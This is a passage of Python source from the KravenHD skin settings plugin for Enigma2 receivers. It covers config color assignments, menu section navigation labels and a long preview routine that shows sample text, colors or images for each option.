config.plugins.KravenHD.TunerXtremeBusyList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.TunerXtremeBusy.value = config.plugins.KravenHD.TunerXtremeBusySelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.TunerXtremeBusy.value = config.plugins.KravenHD.TunerXtremeBusyList.value\n\t\tif config.plugins.KravenHD.IBProgressList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.IBProgress.value = config.plugins.KravenHD.IBProgressSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.IBProgress.value = config.plugins.KravenHD.IBProgressList.value\n\t\tif config.plugins.KravenHD.IBProgressBackgroundList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.IBProgressBackground.value = config.plugins.KravenHD.IBProgressBackgroundSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.IBProgressBackground.value = config.plugins.KravenHD.IBProgressBackgroundList.value\n\t\tif config.plugins.KravenHD.IBProgressBorderLineColorList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.IBProgressBorderLineColor.value = config.plugins.KravenHD.IBProgressBorderLineColorSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.IBProgressBorderLineColor.value = config.plugins.KravenHD.IBProgressBorderLineColorList.value\n\t\tif config.plugins.KravenHD.MainmenuHorTitleFontList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.MainmenuHorTitleFont.value = config.plugins.KravenHD.MainmenuHorTitleFontSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.MainmenuHorTitleFont.value = config.plugins.KravenHD.MainmenuHorTitleFontList.value\n\t\tif config.plugins.KravenHD.MainmenuHorIconColorList.value == \"self\":\n\t\t\tconfig.plugins.KravenHD.MainmenuHorIconColor.value = config.plugins.KravenHD.MainmenuHorIconColorSelf.value\n\t\telse:\n\t\t\tconfig.plugins.KravenHD.MainmenuHorIconColor.value = config.plugins.KravenHD.MainmenuHorIconColorList.value\n\n\t\t### global background\n\t\tif config.plugins.KravenHD.BackgroundColor.value == \"gradient\":\n\t\t\tself.skincolorbackgroundcolor = config.plugins.KravenHD.BackgroundGradientColorPrimary.value\n\t\telif config.plugins.KravenHD.BackgroundColor.value == \"texture\":\n\t\t\tself.skincolorbackgroundcolor = config.plugins.KravenHD.BackgroundAlternateColor.value\n\t\telse:\n\t\t\tself.skincolorbackgroundcolor = config.plugins.KravenHD.BackgroundColor.value\n\n\t\t### infobar background\n\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\tif config.plugins.KravenHD.InfobarGradientColor.value == \"texture\":\n\t\t\t\tself.skincolorinfobarcolor = config.plugins.KravenHD.InfobarAlternateColor.value\n\t\t\telse:\n\t\t\t\tself.skincolorinfobarcolor = config.plugins.KravenHD.InfobarGradientColor.value\n\t\telse:\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skincolorinfobarcolor = config.plugins.KravenHD.InfobarGradientColorPrimary.value\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skincolorinfobarcolor = config.plugins.KravenHD.InfobarAlternateColor.value\n\t\t\telse:\n\t\t\t\tself.skincolorinfobarcolor = config.plugins.KravenHD.InfobarBoxColor.value\n\n\t\t### folders and factor\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tself.data = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/HD/\"\n\t\t\tself.templates = \"/usr/share/enigma2/KravenHD/templates/hd/\"\n\t\t\tself.factor = 1\n\t\telse:\n\t\t\tself.data = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/FHD/\"\n\t\t\tself.templates = \"/usr/share/enigma2/KravenHD/templates/fhd/\"\n\t\t\tself.factor = 1.5\n\t\tself.graphics = \"/usr/share/enigma2/KravenHD/graphics/\"\n\n\t\t### Build list and define situation\n\t\tself[\"config\"].list = list\n\t\tself[\"config\"].l.setList(list)\n\t\tself.updateHelp()\n\t\tself.showRedText()\n\t\tself[\"helperimage\"].hide()\n\t\tself.ShowPicture()\n\t\toption = self[\"config\"].getCurrent()[1]\n\t\tposition = self[\"config\"].instance.getCurrentIndex()\n\n\t\tif position == 0: # about\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"various\"))\n\t\t\tself[\"key_blue\"].setText(_(\"profiles\") + \" >>\")\n\t\tif (2 <= position <= 4): # profiles\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"about\"))\n\t\t\tself[\"key_blue\"].setText(_(\"system\") + \" >>\")\n\t\tif (6 <= position <= 17): # system\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"profiles\"))\n\t\t\tself[\"key_blue\"].setText(_(\"global colors\") + \" >>\")\n\t\tif (18 <= position <= 35): # global colors\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"system\"))\n\t\t\tself[\"key_blue\"].setText(_(\"infobar-look\") + \" >>\")\n\t\tif (36 <= position <= 53): # infobar-look\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"global colors\"))\n\t\t\tself[\"key_blue\"].setText(_(\"infobar-contents\") + \" >>\")\n\t\tif (54 <= position <= 64): # infobar-contents\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"infobar-look\"))\n\t\t\tself[\"key_blue\"].setText(_(\"weather\") + \" >>\")\n\t\tif (72 <= position <= 81): # weather\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"infobar-contents\"))\n\t\t\tself[\"key_blue\"].setText(_(\"clock\") + \" >>\")\n\t\tif (83 <= position <= 85): # clock\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"weather\"))\n\t\t\tself[\"key_blue\"].setText(_(\"ECM infos\") + \" >>\")\n\t\tif (90 <= position <= 94): # ecm infos\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"clock\"))\n\t\t\tself[\"key_blue\"].setText(_(\"views\") + \" >>\")\n\t\tif (96 <= position <= 107): # views\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"ECM infos\"))\n\t\t\tself[\"key_blue\"].setText(_(\"channellist\") + \" >>\")\n\t\tif (108 <= position <= 116): # channellist\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"views\"))\n\t\t\tself[\"key_blue\"].setText(_(\"NumberZap\") + \" >>\")\n\t\tif (122 <= position <= 124): # numberzap\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"channellist\"))\n\t\t\tself[\"key_blue\"].setText(_(\"GraphicalEPG\") + \" >>\")\n\t\tif (126 <= position <= 133): # graphicalepg\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"NumberZap\"))\n\t\t\tself[\"key_blue\"].setText(_(\"EMC\") + \" >>\")\n\t\tif (135 <= position <= 143): # emc\n\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"GraphicalEPG\"))\n\t\t\tself[\"key_blue\"].setText(_(\"player\") + \" >>\")\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif (144 <= position <= 147): # player\n\t\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"EMC\"))\n\t\t\t\tself[\"key_blue\"].setText(_(\"various\") + \" >>\")\n\t\telse:\n\t\t\tif (144 <= position <= 147): # player\n\t\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"EMC\"))\n\t\t\t\tself[\"key_blue\"].setText(_(\"antialiasing\") + \" >>\")\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif (149 <= position <= 151): # various\n\t\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"player\"))\n\t\t\t\tself[\"key_blue\"].setText(_(\"about\") + \" >>\")\n\t\telse:\n\t\t\tif (149 <= position <= 152): # antialiasing\n\t\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"player\"))\n\t\t\t\tself[\"key_blue\"].setText(_(\"various\") + \" >>\")\n\t\t\tif (154 <= position <= 156): # various\n\t\t\t\tself[\"key_yellow\"].setText(\"<< \" + _(\"antialiasing\"))\n\t\t\t\tself[\"key_blue\"].setText(_(\"about\") + \" >>\")\n\n\t\t### version\n\t\tversionpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/version\"\n\t\tversionfile = open(versionpath, \"r\")\n\t\tfor line in versionfile:\n\t\t\tversion = line.rstrip()\n\t\t\tself[\"version\"].setText(version)\n\t\tversionfile.close()\n\n\t\t### preview\n\t\tself.showPreview()\n\n\tdef showPreview(self):\n\t\toption = self[\"config\"].getCurrent()[1]\n\n\t\tif option == config.plugins.KravenHD.customProfile:\n\t\t\tif config.plugins.KravenHD.customProfile.value==self.lastProfile:\n\t\t\t\tself.saveProfile(msg=False)\n\n\t\tif option.value == \"none\":\n\t\t\tself.showText(62, _(\"Off\"))\n\t\telif option.value == \"on\":\n\t\t\tself.showText(62, _(\"On\"))\n\t\telif option == config.plugins.KravenHD.customProfile:\n\t\t\tself.showText(23, \"/etc/enigma2/kravenhd_profile_\"+str(config.plugins.KravenHD.customProfile.value))\n\t\telif option == config.plugins.KravenHD.defaultProfile:\n\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/\"+str(config.plugins.KravenHD.defaultProfile.value)+\".jpg\"):\n\t\t\t\tself[\"helperimage\"].show()\n\t\t\telse:\n\t\t\t\tself.showText(23, \"/etc/enigma2/kravenhd_default_\"+str(config.plugins.KravenHD.defaultProfile.value))\n\t\telif option == config.plugins.KravenHD.TypeWriter:\n\t\t\tif option.value == \"runningtext\":\n\t\t\t\tself.showText(48, _(\"runningtext\"))\n\t\t\telif option.value == \"typewriter\":\n\t\t\t\tself.showText(48, _(\"typewriter\"))\n\t\telif option == config.plugins.KravenHD.RunningText:\n\t\t\tif option.value == \"startdelay=2000\":\n\t\t\t\tself.showText(50, _(\"2 sec\"))\n\t\t\telif option.value == \"startdelay=4000\":\n\t\t\t\tself.showText(50, _(\"4 sec\"))\n\t\t\telif option.value == \"startdelay=6000\":\n\t\t\t\tself.showText(50, _(\"6 sec\"))\n\t\t\telif option.value == \"startdelay=8000\":\n\t\t\t\tself.showText(50, _(\"8 sec\"))\n\t\t\telif option.value == \"startdelay=10000\":\n\t\t\t\tself.showText(50, _(\"10 sec\"))\n\t\t\telif option.value == \"startdelay=15000\":\n\t\t\t\tself.showText(50, _(\"15 sec\"))\n\t\t\telif option.value == \"startdelay=20000\":\n\t\t\t\tself.showText(50, _(\"20 sec\"))\n\t\telif option == config.plugins.KravenHD.RunningTextSpeed:\n\t\t\tif option.value == \"steptime=200\":\n\t\t\t\tself.showText(50, _(\"5 px/sec\"))\n\t\t\telif option.value == \"steptime=100\":\n\t\t\t\tself.showText(50, _(\"10 px/sec\"))\n\t\t\telif option.value == \"steptime=66\":\n\t\t\t\tself.showText(50, _(\"15 px/sec\"))\n\t\t\telif option.value == \"steptime=50\":\n\t\t\t\tself.showText(50, _(\"20 px/sec\"))\n\t\telif option == config.plugins.KravenHD.RunningTextSpeed2:\n\t\t\tif option.value == \"steptime=200\":\n\t\t\t\tself.showText(62, _(\"5 px/sec\"))\n\t\t\telif option.value == \"steptime=100\":\n\t\t\t\tself.showText(62, _(\"10 px/sec\"))\n\t\t\telif option.value == \"steptime=50\":\n\t\t\t\tself.showText(62, _(\"20 px/sec\"))\n\t\t\telif option.value == \"steptime=33\":\n\t\t\t\tself.showText(62, _(\"30 px/sec\"))\n\t\telif option == config.plugins.KravenHD.Primetimeavailable:\n\t\t\tif option.value == \"primetime-on\":\n\t\t\t\tself.showText(62, _(\"On\"))\n\t\telif option == config.plugins.KravenHD.SkinResolution:\n\t\t\tif option.value == \"hd\":\n\t\t\t\tself.showText(54, _(\"HD \\n1280 x 720\"))\n\t\t\telif option.value == \"fhd\":\n\t\t\t\tself.showText(54, _(\"FHD \\n1920 x 1080\"))\n\t\telif option == config.plugins.KravenHD.PopupStyle:\n\t\t\tif option.value == \"popup-grad\":\n\t\t\t\tself.showText(30, _(\"gradient-style \\nwithout transparency \\nglobal background\"))\n\t\t\telif option.value == \"popup-grad-trans\":\n\t\t\t\tself.showText(30, _(\"gradient-style \\nwith transparency \\nglobal background\"))\n\t\t\telif option.value == \"popup-box\":\n\t\t\t\tself.showText(30, _(\"box-style \\nwithout transparency \\nglobal background \\nglobal border\"))\n\t\t\telif option.value == \"popup-box-trans\":\n\t\t\t\tself.showText(30, _(\"box-style \\nwith transparency \\nglobal background \\nglobal border\"))\n\t\telif option in (config.plugins.KravenHD.InfobarChannelName, config.plugins.KravenHD.InfobarChannelName2):\n\t\t\tif option.value == \"infobar-channelname-small\":\n\t\t\t\tself.showText(40, _(\"RTL\"))\n\t\t\telif option.value == \"infobar-channelname-number-small\":\n\t\t\t\tself.showText(40, _(\"5 - RTL\"))\n\t\t\telif option.value == \"infobar-channelname\":\n\t\t\t\tself.showText(76, _(\"RTL\"))\n\t\t\telif option.value == \"infobar-channelname-number\":\n\t\t\t\tself.showText(76, _(\"5 - RTL\"))\n\t\telif option in (config.plugins.KravenHD.ECMLine1, config.plugins.KravenHD.ECMLine2, config.plugins.KravenHD.ECMLine3):\n\t\t\tif option.value == \"VeryShortCaid\":\n\t\t\t\tself.showText(17, \"CAID - Time\")\n\t\t\telif option.value == \"VeryShortReader\":\n\t\t\t\tself.showText(17, \"Reader - Time\")\n\t\t\telif option.value == \"ShortReader\":\n\t\t\t\tself.showText(17, \"CAID - Reader - Time\")\n\t\t\telif option.value == \"Normal\":\n\t\t\t\tself.showText(17, \"CAID - Reader - Hops - Time\")\n\t\t\telif option.value == \"Long\":\n\t\t\t\tself.showText(17, \"CAID - System - Reader - Hops - Time\")\n\t\t\telif option.value == \"VeryLong\":\n\t\t\t\tself.showText(17, \"CAM - CAID - System - Reader - Hops - Time\")\n\t\telif option == config.plugins.KravenHD.FTA and option.value == \"FTAVisible\":\n\t\t\tself.showText(17, _(\"free to air\"))\n\t\telif option in (config.plugins.KravenHD.msn_searchby, config.plugins.KravenHD.msn_code, config.plugins.KravenHD.msn_cityname):\n\t\t\tself.showText(30,_(\"Weather-Code:\\n\") + config.plugins.KravenHD.msn_code.value)\n\t\telif option == config.plugins.KravenHD.msn_language:\n\t\t\tself.showText(30,_(\"Language\") + \":\\n\" + option.value)\n\t\telif option == config.plugins.KravenHD.refreshInterval:\n\t\t\tif option.value == \"15\":\n\t\t\t\tself.showText(50, \"00:15\")\n\t\t\telif option.value == \"30\":\n\t\t\t\tself.showText(50, \"00:30\")\n\t\t\telif option.value == \"60\":\n\t\t\t\tself.showText(50, \"01:00\")\n\t\t\telif option.value == \"120\":\n\t\t\t\tself.showText(50, \"02:00\")\n\t\t\telif option.value == \"240\":\n\t\t\t\tself.showText(50, \"04:00\")\n\t\t\telif option.value == \"480\":\n\t\t\t\tself.showText(50, \"08:00\")\n\t\telif option in (config.plugins.KravenHD.Infobox, config.plugins.KravenHD.Infobox2):\n\t\t\tif option.value == \"sat\":\n\t\t\t\tself.showText(50, \"19.2E S:99%\")\n\t\t\telif option.value == \"tunerinfo\":\n\t\t\t\tself.showText(50, \"19.2E DVB-S\")\n\t\t\telif option.value == \"cpu\":\n\t\t\t\tself.showText(50, \"19% L:0.47\")\n\t\t\telif option.value == \"temp\":\n\t\t\t\tself.showText(50, \"37°C U:1540\")\n\t\telif option == config.plugins.KravenHD.ChannelSelectionMode:\n\t\t\tif option.value == \"zap\":\n\t\t\t\tself.showText(50, \"1 x OK\")\n\t\t\telif option.value == \"preview\":\n\t\t\t\tself.showText(50, \"2 x OK\")\n\t\telif option == config.plugins.KravenHD.PVRState:\n\t\t\tif option.value == \"pvrstate-center-big\":\n\t\t\t\tself.showText(52, \">> 8x\")\n\t\t\telif option.value == \"pvrstate-center-small\":\n\t\t\t\tself.showText(32, \">> 8x\")\n\t\t\telse:\n\t\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.ChannelSelectionEPGSize1:\n\t\t\tif config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"small\":\n\t\t\t\tself.showText(30, _(\"small\"))\n\t\t\telif config.plugins.KravenHD.ChannelSelectionEPGSize1.value == \"big\":\n\t\t\t\tself.showText(40, _(\"big\"))\n\t\telif option == config.plugins.KravenHD.ChannelSelectionEPGSize2:\n\t\t\tif config.plugins.KravenHD.ChannelSelectionEPGSize2.value == \"small\":\n\t\t\t\tself.showText(30, _(\"small\"))\n\t\t\telif config.plugins.KravenHD.ChannelSelectionEPGSize2.value == \"big\":\n\t\t\t\tself.showText(40, _(\"big\"))\n\t\telif option == config.plugins.KravenHD.ChannelSelectionEPGSize3:\n\t\t\tif config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"small\":\n\t\t\t\tself.showText(30, _(\"small\"))\n\t\t\telif config.plugins.KravenHD.ChannelSelectionEPGSize3.value == \"big\":\n\t\t\t\tself.showText(40, _(\"big\"))\n\t\telif option == config.plugins.KravenHD.GMEDescriptionSize:\n\t\t\tif config.plugins.KravenHD.GMEDescriptionSize.value == \"small\":\n\t\t\t\tself.showText(30, _(\"small\"))\n\t\t\telif config.plugins.KravenHD.GMEDescriptionSize.value == \"big\":\n\t\t\t\tself.showText(40, _(\"big\"))\n\t\telif option == config.plugins.KravenHD.IBFontSize:\n\t\t\tif config.plugins.KravenHD.IBFontSize.value == \"small\":\n\t\t\t\tself.showText(30, _(\"small\"))\n\t\t\telif config.plugins.KravenHD.IBFontSize.value == \"middle\":\n\t\t\t\tself.showText(35, _(\"middle\"))\n\t\t\telif config.plugins.KravenHD.IBFontSize.value == \"big\":\n\t\t\t\tself.showText(40, _(\"big\"))\n\t\telif option in (config.plugins.KravenHD.InfobarAntialias, config.plugins.KravenHD.ECMLineAntialias, config.plugins.KravenHD.ScreensAntialias):\n\t\t\tif option.value == 10:\n\t\t\t\tself.showText(50, \"+/- 0%\")\n\t\t\telif option.value in range(0, 10):\n\t\t\t\tself.showText(50, \"- \"+str(100-option.value*10)+\"%\")\n\t\t\telif option.value in range(11, 21):\n\t\t\t\tself.showText(50, \"+ \"+str(option.value*10-100)+\"%\")\n\t\telif option == config.plugins.KravenHD.DebugNames and option.value == \"screennames-on\":\n\t\t\tself.showText(50, \"Debug\")\n\t\telif option in (config.plugins.KravenHD.BackgroundColorTrans, config.plugins.KravenHD.InfobarColorTrans, config.plugins.KravenHD.ChannelSelectionTrans) and option.value == \"00\":\n\t\t\tself.showText(50, _(\"Off\"))\n\t\telif option == config.plugins.KravenHD.BackgroundListColor:\n\t\t\tif config.plugins.KravenHD.BackgroundListColor.value == \"gradient\":\n\t\t\t\tself.showGradient(config.plugins.KravenHD.BackgroundGradientColorPrimary.value, config.plugins.KravenHD.BackgroundGradientColorSecondary.value)\n\t\t\telif config.plugins.KravenHD.BackgroundListColor.value == \"texture\":\n\t\t\t\tself[\"helperimage\"].show()\n\t\t\telse:\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.BackgroundColor.value))\n\t\telif option == config.plugins.KravenHD.BackgroundGradientListColorPrimary:\n\t\t\tself.showGradient(config.plugins.KravenHD.BackgroundGradientColorPrimary.value, config.plugins.KravenHD.BackgroundGradientColorSecondary.value)\n\t\telif option == config.plugins.KravenHD.BackgroundGradientListColorSecondary:\n\t\t\tself.showGradient(config.plugins.KravenHD.BackgroundGradientColorPrimary.value, config.plugins.KravenHD.BackgroundGradientColorSecondary.value)\n\t\telif option == config.plugins.KravenHD.BackgroundAlternateListColor:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.SelectionStyle:\n\t\t\tif config.plugins.KravenHD.SelectionStyle.value == \"pixmap\":\n\t\t\t\tself.showGradient(config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value)\n\t\t\telse:\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.SelectionBackground.value))\n\t\telif option == config.plugins.KravenHD.SelectionBackgroundList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.SelectionBackground.value))\n\t\telif option == config.plugins.KravenHD.SelectionBackground2List:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.SelectionBackground2.value))\n\t\telif option == config.plugins.KravenHD.SelectionBorderList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.SelectionBorder.value))\n\t\telif option == config.plugins.KravenHD.IBProgressList:\n\t\t\tif config.plugins.KravenHD.IBProgressList.value == \"progress\":\n\t\t\t\tself[\"helperimage\"].show()\n\t\t\telse:\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.IBProgress.value))\n\t\telif option == config.plugins.KravenHD.IBProgressBackgroundList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.IBProgressBackground.value))\n\t\telif option == config.plugins.KravenHD.IBProgressBorderLine:\n\t\t\tif option.value == \"ib-progress-border\":\n\t\t\t\tself.showText(30, _(\"border \\nchoose the color below\"))\n\t\t\telif option.value == \"ib-progress-line\":\n\t\t\t\tself.showText(30, _(\"line \\nchoose the color below\"))\n\t\telif option == config.plugins.KravenHD.IBProgressBorderLineColorList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.IBProgressBorderLineColor.value))\n\t\telif option == config.plugins.KravenHD.EMCSelectionColors:\n\t\t\tif config.plugins.KravenHD.EMCSelectionColors.value == \"global\":\n\t\t\t\tif config.plugins.KravenHD.SelectionStyle.value == \"pixmap\":\n\t\t\t\t\tself.showGradient(config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value)\n\t\t\t\telse:\n\t\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.SelectionBackground.value))\n\t\t\telse:\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.EMCSelectionBackground.value))\n\t\telif option == config.plugins.KravenHD.EMCSelectionBackgroundList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.EMCSelectionBackground.value))\n\t\telif option == config.plugins.KravenHD.ProgressList:\n\t\t\tif config.plugins.KravenHD.ProgressList.value == \"progress\":\n\t\t\t\tself[\"helperimage\"].show()\n\t\t\telse:\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Progress.value))\n\t\telif option == config.plugins.KravenHD.BorderList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Border.value))\n\t\telif option == config.plugins.KravenHD.MiniTVBorderList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.MiniTVBorder.value))\n\t\telif option == config.plugins.KravenHD.AnalogColorList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.AnalogColor.value))\n\t\telif option == config.plugins.KravenHD.NZBorderList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.NZBorder.value))\n\t\telif option == config.plugins.KravenHD.GMEBorderList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.GMEBorder.value))\n\t\telif option == config.plugins.KravenHD.GMESelFgList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.GMESelFg.value))\n\t\telif option == config.plugins.KravenHD.GMESelBgList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.GMESelBg.value))\n\t\telif option == config.plugins.KravenHD.GMENowFgList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.GMENowFg.value))\n\t\telif option == config.plugins.KravenHD.GMENowBgList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.GMENowBg.value))\n\t\telif option == config.plugins.KravenHD.LineList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Line.value))\n\t\telif option == config.plugins.KravenHD.Font1List:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Font1.value))\n\t\telif option == config.plugins.KravenHD.Font2List:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Font2.value))\n\t\telif option == config.plugins.KravenHD.IBFont1List:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.IBFont1.value))\n\t\telif option == config.plugins.KravenHD.IBFont2List:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.IBFont2.value))\n\t\telif option == config.plugins.KravenHD.PermanentClockFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.PermanentClockFont.value))\n\t\telif option == config.plugins.KravenHD.SelectionFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.SelectionFont.value))\n\t\telif option == config.plugins.KravenHD.EMCSelectionFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.EMCSelectionFont.value))\n\t\telif option == config.plugins.KravenHD.UnwatchedColorList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.UnwatchedColor.value))\n\t\telif option == config.plugins.KravenHD.WatchingColorList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.WatchingColor.value))\n\t\telif option == config.plugins.KravenHD.FinishedColorList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.FinishedColor.value))\n\t\telif option == config.plugins.KravenHD.MarkedFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.MarkedFont.value))\n\t\telif option == config.plugins.KravenHD.ButtonTextList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.ButtonText.value))\n\t\telif option == config.plugins.KravenHD.AndroidList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Android.value))\n\t\telif option == config.plugins.KravenHD.Android2List:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.Android2.value))\n\t\telif option == config.plugins.KravenHD.ChannelSelectionServiceNAList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.ChannelSelectionServiceNA.value))\n\t\telif option == config.plugins.KravenHD.IBLine:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.InfobarGradientListColor:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.InfobarBoxListColor:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.InfobarGradientListColorPrimary:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.InfobarGradientListColorSecondary:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.InfoStyle:\n\t\t\tif config.plugins.KravenHD.InfoStyle.value == \"primary\":\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.InfobarGradientColorPrimary.value))\n\t\t\telif config.plugins.KravenHD.InfoStyle.value == \"secondary\":\n\t\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.InfobarGradientColorSecondary.value))\n\t\t\telse:\n\t\t\t\tself.showGradient(config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value)\n\t\telif option == config.plugins.KravenHD.InfobarAlternateListColor:\n\t\t\tself[\"helperimage\"].show()\n\t\telif option == config.plugins.KravenHD.ChannelnameFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.ChannelnameFont.value))\n\t\telif option == config.plugins.KravenHD.ECMFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.ECMFont.value))\n\t\telif option == config.plugins.KravenHD.PrimetimeFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.PrimetimeFont.value))\n\t\telif option == config.plugins.KravenHD.TunerBusyList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.TunerBusy.value))\n\t\telif option == config.plugins.KravenHD.TunerLiveList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.TunerLive.value))\n\t\telif option == config.plugins.KravenHD.TunerRecordList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.TunerRecord.value))\n\t\telif option == config.plugins.KravenHD.TunerXtremeBusyList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.TunerXtremeBusy.value))\n\t\telif option == config.plugins.KravenHD.MainmenuHorTitleFontList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.MainmenuHorTitleFont.value))\n\t\telif option == config.plugins.KravenHD.MainmenuHorIconColorList:\n\t\t\tself.showColor(self.hexRGB(config.plugins.KravenHD.MainmenuHorIconColor.value))\n\t\telif option == config.plugins.KravenHD.ECMVisible:\n\t\t\tif option.value == \"0\":\n\t\t\t\tself.showText(36, _(\"Off\"))\n\t\t\telif option.value == \"ib\":\n\t\t\t\tself.showText(36, _(\"Infobar\"))\n\t\t\telif option.value == \"sib\":\n\t\t\t\tself.showText(36, \"SecondInfobar\")\n\t\t\telif option.value == \"ib+sib\":\n\t\t\t\tself.showText(36, _(\"Infobar & \\nSecondInfobar\"))\n\t\telse:\n\t\t\tself[\"helperimage\"].show()\n\n\tdef updateHelp(self):\n\t\tcur = self[\"config\"].getCurrent()\n\t\tif cur:\n\t\t\tself[\"help\"].text = cur[2]\n\n\tdef showRedText(self):\n\t\toption = self[\"config\"].getCurrent()[1]\n\t\tif option.value == \"auto-ip\" or option.value == \"location\" or option == config.plugins.KravenHD.msn_cityname:\n\t\t\tself[\"key_red\"].text = _(\"Search Code\")\n\t\telse:\n\t\t\tself[\"key_red\"].text = _(\"FAQs\")\n\n\tdef GetPicturePath(self):\n\t\ttry:\n\t\t\toptionValue = self[\"config\"].getCurrent()[1]\n\t\t\treturnValue = self[\"config\"].getCurrent()[1].value\n\t\t\tif optionValue == config.plugins.KravenHD.BackgroundListColor and config.plugins.KravenHD.BackgroundListColor.value == 